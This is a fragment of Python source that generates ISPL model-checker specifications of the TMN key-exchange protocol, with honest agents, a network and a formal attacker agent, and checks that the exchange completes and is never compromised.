def __create_attacker(self):
    """Assemble the complete ISPL 'Agent Attacker' section from its sub-sections."""
    return "".join((
        "Agent Attacker\n",
        self.__create_attacker_vars(),
        self.__create_attacker_actions(),
        self.__create_attacker_protocol(),
        self.__create_attacker_evolution(),
        "end Agent\n\n",
    ))
def __create_attacker_lobsvars(self):
    """Emit the Attacker's (currently empty) Lobsvars declaration."""
    return "\tLobsvars = {};\n"
def __create_attacker_vars(self):
    """Emit the Attacker's Vars section: key flags per agent plus per-message state."""
    body = "".join(f"\t\t{owner}Key : boolean;\n" for owner in self.agents)
    body += "".join(
        f"\t\tmessage{no} : " + "{none, plain, encrypted};\n"
        for no in range(1, self.no_messages + 1)
    )
    return "\tVars:\n" + body + "\tend Vars\n"
def __create_attacker_actions(self):
    """Emit the Attacker's actions: decrypting messages and forwarding them to other agents."""
    cap = StringTools.capitalize_first_letter
    out = "\tActions = {"
    for no in range(1, self.no_messages + 1):
        out += f"decryptMessage{no}, "
        out += "".join(
            f"sendMessage{no}To{cap(peer)}, "
            for peer in self.agents
            if peer != 'attacker'
        )
    return out + "Wait};\n"
def __create_attacker_protocol(self):
    """Emit the Attacker's Protocol section.

    The attacker may only decrypt messages for which it holds the matching
    key; otherwise it waits (its sends are not guarded here).
    """
    protocol = "\tProtocol:\n"
    for message_no in range(1, self.no_messages + 1):
        for agent_name in self.agents:
            protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
        # Trim the trailing " or\n" before closing the guard.
        protocol = protocol.rstrip("\nro ")
        protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_attacker_evolution(self):
    """Emit the Attacker's Evolution section.

    The attacker learns keys by decrypting, and receives (a copy of) every
    message exchanged between any ordered pair of distinct agents.
    """
    evolution = "\tEvolution:\n"
    for agent_name in self.agents:
        evolution += f"\t\t{agent_name}Key=true if\n"
        for message_no in range(1, self.no_messages + 1):
            evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
        # Trim the trailing " or\n".
        evolution = evolution.rstrip("\nro ")
        evolution += ";\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=encrypted if\n"
        evolution += f"\t\t\tmessage{message_no}=none and\n"
        evolution += "\t\t\t(\n"
        for agent_name in self.agents:
            agent_name = StringTools.capitalize_first_letter(agent_name)
            for second_agent in self.agents:
                second_agent = StringTools.capitalize_first_letter(second_agent)
                if agent_name == second_agent:
                    continue
                evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}To{second_agent} or\n"
        # Deliberately no space in the strip set: the destination may be
        # "Server", whose trailing 'r' must survive; a trailing space remains.
        evolution = evolution.rstrip("\nro")
        evolution += ");\n"
    evolution += "\tend Evolution\n"
    return evolution
def __create_evaluation(self):
    """Emit the Evaluation section defining the model-checking propositions."""
    return (
        "Evaluation\n"
        "\tkeyExchanged if Alice.bobKey=true;\n"
        "\tcompromised if Attacker.aliceKey=true or Attacker.bobKey=true or Attacker.serverKey=true;\n"
        "end Evaluation\n\n"
    )
def __create_init_states(self):
    """Emit the InitStates section: per-message key/content assignments,
    initial message possession, and each agent's initial key knowledge.

    NOTE(review): the hard-coded key lists assume no_messages == 3; a larger
    message count would raise IndexError here — confirm before changing it.
    """
    init_states = "InitStates\n"
    # Which agent's key encrypts each protocol message.
    keys = ["server", "server", "alice"]
    init_states += "\tEnvironment.protocol=false and\n"
    for message_no in range(1, self.no_messages + 1):
        init_states += f"\tEnvironment.message{message_no}Key={keys[message_no - 1]}KeyM and\n"
    # Which agent's key each message carries as content.
    keys = ["alice", "bob", "bob"]
    for message_no in range(1, self.no_messages + 1):
        init_states += f"\tEnvironment.message{message_no}Content={keys[message_no - 1]}KeyM and\n"
    for agent_name in self.agents:
        agent_name = StringTools.capitalize_first_letter(agent_name)
        for message_no in range(1, self.no_messages + 1):
            # Only the protocol's first two messages start in their senders' hands.
            msg = "none"
            if agent_name == "Alice" and message_no == 1:
                msg = "plain"
            elif agent_name == "Bob" and message_no == 2:
                msg = "plain"
            init_states += f"\t{agent_name}.message{message_no}={msg} and\n"
    for agent_name in self.agents:
        for key_name in self.agents:
            # Each agent initially knows only its own key.
            know_key = "false"
            if agent_name == key_name:
                know_key = "true"
            init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}Key={know_key} and\n"
    # Strips the trailing " and\n" (rstrip removes the character set '\n','d','n','a',' ').
    init_states = init_states.rstrip("\ndna ")
    init_states += ";\nend InitStates\n\n"
    return init_states
def __create_groups(self):
    """Emit the Groups section: the trusted coalition vs. the attacker."""
    return (
        "Groups\n"
        "\ttrusted={Alice, Bob, Server};\n"
        "\tatk={Attacker};\n"
        "end Groups\n\n"
    )
def __create_formulae(self):
    """Emit the Formulae section: the two ATL properties to model-check."""
    return (
        "Formulae\n"
        "\t<trusted>F keyExchanged;\n"
        "\t<trusted>G !compromised;\n"
        "end Formulae\n\n"
    )
class TmnProtocolIsplGeneratorV2:
    """Generates an ISPL (MCMAS) model of the TMN key-exchange protocol, v2.

    Unlike v1, this version models explicit keys (including the server's
    asymmetric pair) and routes every message through a Network agent,
    giving the attacker interception and redirection capabilities.
    """
    # NOTE(review): these are class-level attributes shared by all instances.
    # Caches the most recently generated model text.
    ispl_model = ""
    # Lower-case agent names; capitalised forms are derived where needed.
    agents = ["alice", "bob", "server", "attacker"]
    # All keys modelled in the protocol.
    keys = ["aliceKey", "bobKey", "serverPublicKey", "serverPrivateKey", "attackerKey"]
    # Number of messages in the scripted exchange.
    no_messages = 3
    # True restricts honest agents to the scripted TMN message sequence.
    follow_protocol = True
    def __init__(self):
        # No per-instance state; all configuration lives in the class attributes.
        return
def create_ispl_model(self):
    """Build and return the complete ISPL model text.

    The result is also stored in ``self.ispl_model``.  The model is rebuilt
    from scratch on every call; previously the sections were appended to the
    shared ``ispl_model`` attribute, so calling this method twice (or on two
    instances) duplicated the entire model text.

    Returns:
        str: the full ISPL source for the model.
    """
    parts = [self.__define_semantics(), self.__create_environment()]
    for agent_name in self.agents:
        if agent_name == "attacker":
            continue  # the attacker gets a dedicated, more capable agent below
    	
        parts.append(self.__create_agent(agent_name))
    parts.append(self.__create_attacker())
    parts.append(self.__create_network())
    parts.append(self.__create_evaluation())
    parts.append(self.__create_init_states())
    parts.append(self.__create_groups())
    parts.append(self.__create_formulae())
    # Assign (not append) so repeated calls stay idempotent.
    self.ispl_model = "".join(parts)
    return self.ispl_model
def __define_semantics(self):
    """Emit the semantics directive that heads every generated model."""
    return "Semantics=SingleAssignment;\n\n"
def __create_environment(self):
    """Assemble the ISPL Environment agent from its sub-sections."""
    return "".join((
        "Agent Environment\n",
        self.__create_environment_obsvars(),
        self.__create_environment_vars(),
        self.__create_environment_actions(),
        self.__create_environment_protocol(),
        self.__create_environment_evolution(),
        "end Agent\n\n",
    ))
def __create_environment_obsvars(self):
    """Emit the Environment's observable variables: message-in-transit and protocol flags."""
    return (
        "\tObsvars:\n"
        "\t\tprocessingMessage : boolean;\n"
        "\t\tprotocol : boolean;\n"
        "\tend Obsvars\n"
    )
def __create_environment_vars(self):
    """Emit the Environment's (empty) private Vars section."""
    return "\tVars:\n\tend Vars\n"
def __create_environment_actions(self):
    """Emit the Environment's action set: only the 'none' action."""
    return "\tActions = {none};\n"
def __create_environment_protocol(self):
    """Emit the Environment's trivial Protocol: always pick 'none'."""
    return "\tProtocol:\n\t\tOther: {none};\n\tend Protocol\n"
def __create_environment_evolution(self):
    """Emit the Environment's Evolution: the processingMessage toggle.

    processingMessage becomes true when any modelled Send action fires —
    every sender/content/destination/encryption combination when
    follow_protocol is off; otherwise the three scripted TMN sends plus all
    of the attacker's free sends — and becomes false once the Network
    forwards the message.
    """
    evolution = "\tEvolution:\n"
    evolution += "\t\tprocessingMessage=true if\n"
    if not self.follow_protocol:
        for message_content in self.keys:
            message_content = StringTools.capitalize_first_letter(message_content)
            for message_source in self.agents:
                message_source = StringTools.capitalize_first_letter(message_source)
                for message_destination in self.agents:
                    message_destination = StringTools.capitalize_first_letter(message_destination)
                    if message_source == message_destination:
                        continue  # no self-sends
                    for message_encryption in self.keys:
                        message_encryption = StringTools.capitalize_first_letter(message_encryption)
                        evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
    else:
        # The three scripted TMN sends by the honest agents...
        evolution += "\t\t\tAlice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey or\n"
        evolution += "\t\t\tBob.Action=SendBobKeyToServerEncryptedWithServerPublicKey or\n"
        evolution += "\t\t\tServer.Action=SendBobKeyToAliceEncryptedWithAliceKey or\n"
        # ...plus every send the attacker could make.
        for message_content in self.keys:
            message_content = StringTools.capitalize_first_letter(message_content)
            message_source = "Attacker"
            for message_destination in self.agents:
                message_destination = StringTools.capitalize_first_letter(message_destination)
                if message_source == message_destination:
                    continue
                for message_encryption in self.keys:
                    message_encryption = StringTools.capitalize_first_letter(message_encryption)
                    evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
    # Trim the dangling " or \n" before closing the rule.
    evolution = evolution.rstrip("\nro ")
    evolution += ";\n"
    evolution += "\t\tprocessingMessage=false if\n"
    for message_content in self.keys:
        message_content = StringTools.capitalize_first_letter(message_content)
        for message_destination in self.agents:
            message_destination = StringTools.capitalize_first_letter(message_destination)
            for message_encryption in self.keys:
                message_encryption = StringTools.capitalize_first_letter(message_encryption)
                evolution += f"\t\t\tNetwork.Action=Forward{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
    evolution = evolution.rstrip("\nro ")
    evolution += ";\n"
    evolution += "\tend Evolution\n"
    return evolution
def __create_attacker(self):
    """Assemble the complete ISPL 'Agent Attacker' section from its sub-sections."""
    return "".join((
        "Agent Attacker\n",
        self.__create_attacker_vars(),
        self.__create_attacker_actions(),
        self.__create_attacker_protocol(),
        self.__create_attacker_evolution(),
        "end Agent\n\n",
    ))
def __create_attacker_lobsvars(self):
    """Emit the attacker's (currently empty) Lobsvars declaration."""
    return "\tLobsvars = {};\n"
def __create_attacker_vars(self):
    """Emit the attacker's Vars: per-key knowledge state and recorded encryption key."""
    state_lines = [f"\t\t{key}K : " + "{none, plain, encrypted};\n" for key in self.keys]
    key_domain = "".join(f"{key}, " for key in self.keys) + "none};\n"
    enc_lines = [f"\t\t{key}EncryptionKey : " + "{" + key_domain for key in self.keys]
    return "\tVars:\n" + "".join(state_lines) + "".join(enc_lines) + "\tend Vars\n"
def __create_attacker_actions(self):
    """Emit the attacker's action set.

    Per key: decrypt it, and send it to every other agent under every
    encryption key.  Plus: redirect the in-flight message to any agent,
    replace its content/encryption, forward it unchanged, or wait.
    """
    actions = "\tActions = {"
    for key_name in self.keys:
        key_name = StringTools.capitalize_first_letter(key_name)
        actions += f"Decrypt{key_name}, "
        for agent_name in self.agents:
            agent_name = StringTools.capitalize_first_letter(agent_name)
            if agent_name == "Attacker":
                continue  # no self-sends.
            for encryption_key in self.keys:
                encryption_key = StringTools.capitalize_first_letter(encryption_key)
                actions += f"Send{key_name}To{agent_name}EncryptedWith{encryption_key}, "
    for agent_name in self.agents:
        agent_name = StringTools.capitalize_first_letter(agent_name)
        actions += f"RedirectTo{agent_name}, "
    for content_key in self.keys:
        content_key = StringTools.capitalize_first_letter(content_key)
        for encryption_key in self.keys:
            encryption_key = StringTools.capitalize_first_letter(encryption_key)
            actions += f"ChangeContentTo{content_key}EncryptedWith{encryption_key}, "
    actions += "ForwardMessage, "
    actions += "Wait};\n"
    return actions
def __create_attacker_protocol(self):
    """Emit the attacker's Protocol: decryption, free sends, and in-transit
    message manipulation (redirect / forward / content replacement)."""
    protocol = "\tProtocol:\n"
    protocol += self.__create_protocol_decryption()
    protocol += self.__create_protocol_communication("attacker")
    # While a message is in transit the attacker may redirect or forward it.
    protocol += "\t\tEnvironment.processingMessage=true : {"
    for agent_name in self.agents:
        agent_name = StringTools.capitalize_first_letter(agent_name)
        protocol += f"RedirectTo{agent_name}, "
    protocol += "ForwardMessage, Wait};\n"
    # Content tampering requires knowing both the new content and the encryption key.
    for content_key in self.keys:
        for encryption_key in self.keys:
            protocol += f"\t\t{content_key}K=plain and {encryption_key}K=plain and Environment.processingMessage=true: " + "{"
            protocol += f"ChangeContentTo{StringTools.capitalize_first_letter(content_key)}EncryptedWith{StringTools.capitalize_first_letter(encryption_key)}, "
            protocol += "Wait};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_attacker_evolution(self):
    """Emit the attacker's Evolution: key decryption plus message-receipt rules."""
    return (
        "\tEvolution:\n"
        + self.__create_evolution_key_decryption()
        + self.__create_evolution_message_receiving("Attacker")
        + "\tend Evolution\n"
    )
def __create_agent(self, agent_name):
    """Assemble a trusted agent's ISPL section (Alice, Bob or Server)."""
    title = StringTools.capitalize_first_letter(agent_name)
    return "".join((
        f"Agent {title}\n",
        self.__create_agent_vars(),
        self.__create_agent_actions(title),
        self.__create_agent_protocol(title),
        self.__create_agent_evolution(title),
        "end Agent\n\n",
    ))
def __create_agent_vars(self):
    """Emit a trusted agent's Vars: per-key knowledge state and recorded encryption key."""
    lines = ["\tVars:\n"]
    for key in self.keys:
        lines.append(f"\t\t{key}K : " + "{none, plain, encrypted};\n")
    for key in self.keys:
        domain = "".join(f"{other}, " for other in self.keys)
        lines.append(f"\t\t{key}EncryptionKey : " + "{" + domain + "none};\n")
    lines.append("\tend Vars\n")
    return "".join(lines)
def __create_agent_actions(self, current_agent_name):
    """Emit a trusted agent's action set.

    Per key: decrypt it, and (only outside the scripted protocol) send it to
    every other agent under every encryption key.  When following the
    protocol the agent instead gets its single scripted Send action.
    """
    actions = "\tActions = {"
    current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
    for key_name in self.keys:
        key_name = StringTools.capitalize_first_letter(key_name)
        actions += f"Decrypt{key_name}, "
        if not self.follow_protocol:
            # The inner sends reuse key_name bound by the enclosing loop.
            for agent_name in self.agents:
                agent_name = StringTools.capitalize_first_letter(agent_name)
                if agent_name == current_agent_name:
                    continue  # no self-sends.
                for encryption_key in self.keys:
                    encryption_key = StringTools.capitalize_first_letter(encryption_key)
                    actions += f"Send{key_name}To{agent_name}EncryptedWith{encryption_key}, "
    if self.follow_protocol:
        # Each honest agent has exactly one scripted TMN send.
        if current_agent_name == "Alice":
            actions += "SendAliceKeyToServerEncryptedWithServerPublicKey, "
        elif current_agent_name == "Bob":
            actions += "SendBobKeyToServerEncryptedWithServerPublicKey, "
        elif current_agent_name == "Server":
            actions += "SendBobKeyToAliceEncryptedWithAliceKey, "
    actions += "Wait};\n"
    return actions
def __create_agent_protocol(self, current_agent_name):
    """Emit a trusted agent's Protocol: decryption guards plus either free
    communication or the agent's single scripted protocol send.

    current_agent_name is expected to arrive already capitalised (see the
    comparisons against "Alice"/"Bob"/"Server" below).
    """
    protocol = "\tProtocol:\n"
    protocol += self.__create_protocol_decryption()
    if not self.follow_protocol:
        protocol += self.__create_protocol_communication(current_agent_name)
    else:
        if current_agent_name == "Alice":
            protocol += "\t\tEnvironment.protocol=true and Environment.processingMessage=false: {SendAliceKeyToServerEncryptedWithServerPublicKey, Wait};\n"
        elif current_agent_name == "Bob":
            protocol += "\t\tEnvironment.protocol=true and Environment.processingMessage=false: {SendBobKeyToServerEncryptedWithServerPublicKey, Wait};\n"
        elif current_agent_name == "Server":
            # The server only replies once it has both session keys in plain form.
            protocol += "\t\tEnvironment.protocol=true and aliceKeyK=plain and bobKeyK=plain and Environment.processingMessage=false: {SendBobKeyToAliceEncryptedWithAliceKey, Wait};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_protocol_decryption(self):
    """Emit the decryption guards shared by all agents.

    A key variable may be decrypted when the key it was encrypted with is
    known in plain form; for the asymmetric server pair the *counterpart*
    key is required (public decrypts private and vice versa), while
    symmetric keys decrypt themselves.
    """
    protocol = ""
    for key_name in self.keys:
        protocol += f"\t\t{key_name}K=encrypted and (\n"
        for key_name2 in self.keys:
            if key_name2.find("Public") != -1:
                # Encrypted with a public key -> need the matching private key.
                key_name3 = key_name2.replace("Public", "Private")
                protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name3}K=plain) or\n"
            elif key_name2.find("Private") != -1:
                # Encrypted with a private key -> need the matching public key.
                key_name3 = key_name2.replace("Private", "Public")
                protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name3}K=plain) or\n"
            else:
                # Symmetric key: decrypts itself.
                protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name2}K=plain) or\n"
        # Trim the trailing " or\n" before closing the guard.
        protocol = protocol.rstrip("\nro ")
        protocol += "): {" + f"Decrypt{StringTools.capitalize_first_letter(key_name)}" + "};\n"
    return protocol
def __create_protocol_communication(self, current_agent_name):
    """Emit free-communication guards (non-protocol mode): any known-plain
    key may be sent to any other agent encrypted under any known-plain key,
    provided no message is already in transit."""
    protocol = ""
    current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
    for content_key in self.keys:
        for encryption_key in self.keys:
            protocol += f"\t\t{content_key}K=plain and {encryption_key}K=plain and Environment.processingMessage=false and Environment.protocol=false: " + "{"
            for agent_name in self.agents:
                agent_name = StringTools.capitalize_first_letter(agent_name)
                if agent_name == current_agent_name:
                    continue  # never send to oneself.
                protocol += f"Send{StringTools.capitalize_first_letter(content_key)}To{agent_name}EncryptedWith{StringTools.capitalize_first_letter(encryption_key)}, "
            protocol += "Wait};\n"
    return protocol
def __create_agent_evolution(self, current_agent_name):
    """Emit a trusted agent's Evolution: key decryption plus message-receipt rules."""
    return (
        "\tEvolution:\n"
        + self.__create_evolution_key_decryption()
        + self.__create_evolution_message_receiving(current_agent_name)
        + "\tend Evolution\n"
    )
def __create_evolution_key_decryption(self):
    """Emit one Evolution rule per key: performing its Decrypt action makes it plain."""
    return "".join(
        f"\t\t{key}K=plain if\n"
        f"\t\t\tAction=Decrypt{StringTools.capitalize_first_letter(key)};\n"
        for key in self.keys
    )
def __create_evolution_message_receiving(self, current_agent_name):
    """Emit receipt rules for one agent: a key variable becomes 'encrypted'
    and its encryption key is recorded whenever the Network forwards that
    key to this agent."""
    evolution = ""
    current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
    for received_key in self.keys:
        evolution += f"\t\t{received_key}K=encrypted if\n"
        evolution += f"\t\t\t{received_key}K=none and (\n"
        received_key = StringTools.capitalize_first_letter(received_key)
        for encryption_key in self.keys:
            encryption_key = StringTools.capitalize_first_letter(encryption_key)
            evolution += f"\t\t\tNetwork.Action=Forward{received_key}To{current_agent_name}EncryptedWith{encryption_key} or\n"
        # Trim the trailing " or\n" before closing the disjunction.
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    for received_key in self.keys:
        for encryption_key in self.keys:
            evolution += f"\t\t{received_key}EncryptionKey={encryption_key} if\n"
            evolution += f"\t\t\t{received_key}EncryptionKey=none and\n"
            encryption_key = StringTools.capitalize_first_letter(encryption_key)
            evolution += f"\t\t\tNetwork.Action=Forward{StringTools.capitalize_first_letter(received_key)}To{current_agent_name}EncryptedWith{encryption_key};\n"
    return evolution
def __create_network(self):
    """Assemble the complete ISPL 'Agent Network' section from its sub-sections."""
    return "".join((
        "Agent Network\n",
        self.__create_network_vars(),
        self.__create_network_actions(),
        self.__create_network_protocol(),
        self.__create_network_evolution(),
        "end Agent\n\n",
    ))
def __create_network_lobsvars(self):
    """Emit the Network's (currently empty) Lobsvars declaration."""
    return "\tLobsvars = {};\n"
def __create_network_vars(self):
    """Emit the Network's Vars: the in-flight message fields plus attacker bookkeeping flags."""
    key_domain = "".join(f"{key}, " for key in self.keys) + "none};\n"
    agent_domain = "".join(f"{name}, " for name in self.agents) + "none};\n"
    return (
        "\tVars:\n"
        + "\t\tmessageContent : {" + key_domain
        + "\t\tmessageDestination: {" + agent_domain
        + "\t\tmessageSource: {" + agent_domain
        + "\t\tmessageEncryption : {" + key_domain
        + "\t\tattackerDone : boolean;\n"
        + "\t\tforwardAllToAttacker : boolean;\n"
        + "\t\tforwardedToAttacker : boolean;\n"
        + "\t\twaitForAttacker : boolean;\n"
        + "\tend Vars\n"
    )
def __create_network_actions(self):
    """Emit the Network's actions: forwarding any key to any agent under any encryption."""
    cap = StringTools.capitalize_first_letter
    forwards = "".join(
        f"Forward{cap(content)}To{cap(agent)}EncryptedWith{cap(enc)}, "
        for content in self.keys
        for agent in self.agents
        for enc in self.keys
    )
    return "\tActions = {" + forwards + "Wait};\n"
def __create_network_protocol(self):
    """Emit the Network's Protocol: deliver the stored message once attacker
    constraints are satisfied, or divert it to the attacker first when
    forwardAllToAttacker is set."""
    protocol = "\tProtocol:\n"
    for message_content in self.keys:
        for message_destination in self.agents:
            for message_encryption in self.keys:
                # Normal delivery: any required attacker hand-off has already happened.
                protocol += f"\t\t((attackerDone=true and waitForAttacker=true) or waitForAttacker=false) and ((forwardAllToAttacker=true and forwardedToAttacker=true) or forwardAllToAttacker=false) and messageContent={message_content} and messageDestination={message_destination} and messageEncryption={message_encryption}: " + "{"
                protocol += f"Forward{StringTools.capitalize_first_letter(message_content)}To{StringTools.capitalize_first_letter(message_destination)}EncryptedWith{StringTools.capitalize_first_letter(message_encryption)}" + "};\n"
    for message_content in self.keys:
        for message_encryption in self.keys:
            # Interception: route the message to the attacker before delivery.
            protocol += f"\t\tforwardAllToAttacker=true and forwardedToAttacker=false and messageContent={message_content} and messageEncryption={message_encryption}: " + "{"
            protocol += f"Forward{StringTools.capitalize_first_letter(message_content)}ToAttackerEncryptedWith{StringTools.capitalize_first_letter(message_encryption)}" + "};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_network_evolution(self):
    """Emit the Network agent's Evolution section.

    Combines the helper rule groups (attacker bookkeeping, field reset,
    redirection, content tampering) with rules latching the in-flight
    message's content, source, destination and encryption whenever a Send
    action fires.  With follow_protocol set, only the attacker's free sends
    plus the three scripted TMN sends are modelled (the fixed lines at the
    end).
    """
    evolution = "\tEvolution:\n"
    evolution += "\t\tattackerDone=true if Attacker.Action=ForwardMessage;\n"
    evolution += self.__create_network_evolution_forward_to_attacker()
    evolution += self.__create_network_evolution_clean_vars()
    evolution += self.__create_network_evolution_redirect()
    evolution += self.__create_network_evolution_change_content()
    # messageContent rules: one per key, covering every Send that could carry it.
    for message_content in self.keys:
        evolution += f"\t\tmessageContent={message_content} if (\n"
        message_content = StringTools.capitalize_first_letter(message_content)
        if not self.follow_protocol:
            for message_source in self.agents:
                message_source = StringTools.capitalize_first_letter(message_source)
                for message_destination in self.agents:
                    message_destination = StringTools.capitalize_first_letter(message_destination)
                    if message_source == message_destination:
                        continue  # no self-sends.
                    for message_encryption in self.keys:
                        message_encryption = StringTools.capitalize_first_letter(message_encryption)
                        evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        else:
            # Under the scripted protocol only the attacker sends freely here.
            message_source = "Attacker"
            for message_destination in self.agents:
                message_destination = StringTools.capitalize_first_letter(message_destination)
                if message_source == message_destination:
                    continue
                for message_encryption in self.keys:
                    message_encryption = StringTools.capitalize_first_letter(message_encryption)
                    evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        # Trim the trailing " or \n" before closing the disjunction.
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    # messageSource rules.
    if not self.follow_protocol:
        for message_source in self.agents:
            evolution += f"\t\tmessageSource={message_source} if (\n"
            message_source = StringTools.capitalize_first_letter(message_source)
            for message_content in self.keys:
                message_content = StringTools.capitalize_first_letter(message_content)
                for message_destination in self.agents:
                    message_destination = StringTools.capitalize_first_letter(message_destination)
                    if message_source == message_destination:
                        continue
                    for message_encryption in self.keys:
                        message_encryption = StringTools.capitalize_first_letter(message_encryption)
                        evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
            evolution = evolution.rstrip("\nro ")
            evolution += ");\n"
    else:
        evolution += f"\t\tmessageSource=attacker if (\n"
        message_source = "Attacker"
        for message_content in self.keys:
            message_content = StringTools.capitalize_first_letter(message_content)
            for message_destination in self.agents:
                message_destination = StringTools.capitalize_first_letter(message_destination)
                if message_source == message_destination:
                    continue
                for message_encryption in self.keys:
                    message_encryption = StringTools.capitalize_first_letter(message_encryption)
                    evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    # messageDestination rules.
    for message_destination in self.agents:
        if self.follow_protocol and message_destination == "attacker":
            continue  # in protocol mode nobody addresses the attacker directly.
        evolution += f"\t\tmessageDestination={message_destination} if (\n"
        message_destination = StringTools.capitalize_first_letter(message_destination)
        if not self.follow_protocol:
            for message_source in self.agents:
                message_source = StringTools.capitalize_first_letter(message_source)
                if message_source == message_destination:
                    continue
                for message_content in self.keys:
                    message_content = StringTools.capitalize_first_letter(message_content)
                    for message_encryption in self.keys:
                        message_encryption = StringTools.capitalize_first_letter(message_encryption)
                        evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        else:
            message_source = "Attacker"
            if message_source == message_destination:
                # NOTE(review): unreachable — attacker destinations were skipped above.
                continue
            for message_content in self.keys:
                message_content = StringTools.capitalize_first_letter(message_content)
                for message_encryption in self.keys:
                    message_encryption = StringTools.capitalize_first_letter(message_encryption)
                    evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    # messageEncryption rules.
    for message_encryption in self.keys:
        evolution += f"\t\tmessageEncryption={message_encryption} if (\n"
        message_encryption = StringTools.capitalize_first_letter(message_encryption)
        if not self.follow_protocol:
            for message_source in self.agents:
                message_source = StringTools.capitalize_first_letter(message_source)
                for message_destination in self.agents:
                    message_destination = StringTools.capitalize_first_letter(message_destination)
                    if message_source == message_destination:
                        continue
                    for message_content in self.keys:
                        message_content = StringTools.capitalize_first_letter(message_content)
                        evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        else:
            message_source = "Attacker"
            for message_destination in self.agents:
                message_destination = StringTools.capitalize_first_letter(message_destination)
                if message_source == message_destination:
                    continue
                for message_content in self.keys:
                    message_content = StringTools.capitalize_first_letter(message_content)
                    evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    if self.follow_protocol:
        # Effects of the three scripted TMN sends on the message fields.
        evolution += "\t\tmessageContent=aliceKey if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageContent=bobKey if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageContent=bobKey if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
        evolution += "\t\tmessageSource=alice if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageSource=bob if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageSource=server if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
        evolution += "\t\tmessageDestination=server if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageDestination=server if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageDestination=alice if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
        evolution += "\t\tmessageEncryption=serverPublicKey if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageEncryption=serverPublicKey if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
        evolution += "\t\tmessageEncryption=aliceKey if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
    evolution += "\tend Evolution\n"
    return evolution
def __create_network_evolution_forward_to_attacker(self):
    """Emit the rule marking the in-flight message as handed to the attacker."""
    header = (
        "\t\tforwardedToAttacker=true if\n"
        "\t\t\tforwardAllToAttacker=true and (\n"
    )
    cap = StringTools.capitalize_first_letter
    body = "".join(
        f"\t\t\tAction=Forward{cap(content)}ToAttackerEncryptedWith{cap(enc)} or\n"
        for content in self.keys
        for enc in self.keys
    )
    # rstrip removes the dangling " or\n" left after the last disjunct.
    return (header + body).rstrip("\nro ") + ");\n"
def __create_network_evolution_clean_vars(self):
    """Emit rules resetting the message fields and attacker flags after the
    Network forwards any message to any destination."""
    evolution = ""
    # Shadows the builtin 'vars'; kept as-is for compatibility with the original.
    vars = [["messageContent", "none"], ["messageDestination", "none"], ["messageSource", "none"],
            ["messageEncryption", "none"], ["forwardedToAttacker", "false"], ["attackerDone", "false"]]
    for var in vars:
        evolution += f"\t\t{var[0]}={var[1]} if\n"
        evolution += f"\t\t\t((forwardedToAttacker=true and forwardAllToAttacker=true) or forwardAllToAttacker=false) and (\n"
        for key_name in self.keys:
            key_name = StringTools.capitalize_first_letter(key_name)
            for agent_name in self.agents:
                agent_name = StringTools.capitalize_first_letter(agent_name)
                for encryption_key in self.keys:
                    encryption_key = StringTools.capitalize_first_letter(encryption_key)
                    evolution += f"\t\t\tAction=Forward{key_name}To{agent_name}EncryptedWith{encryption_key} or\n"
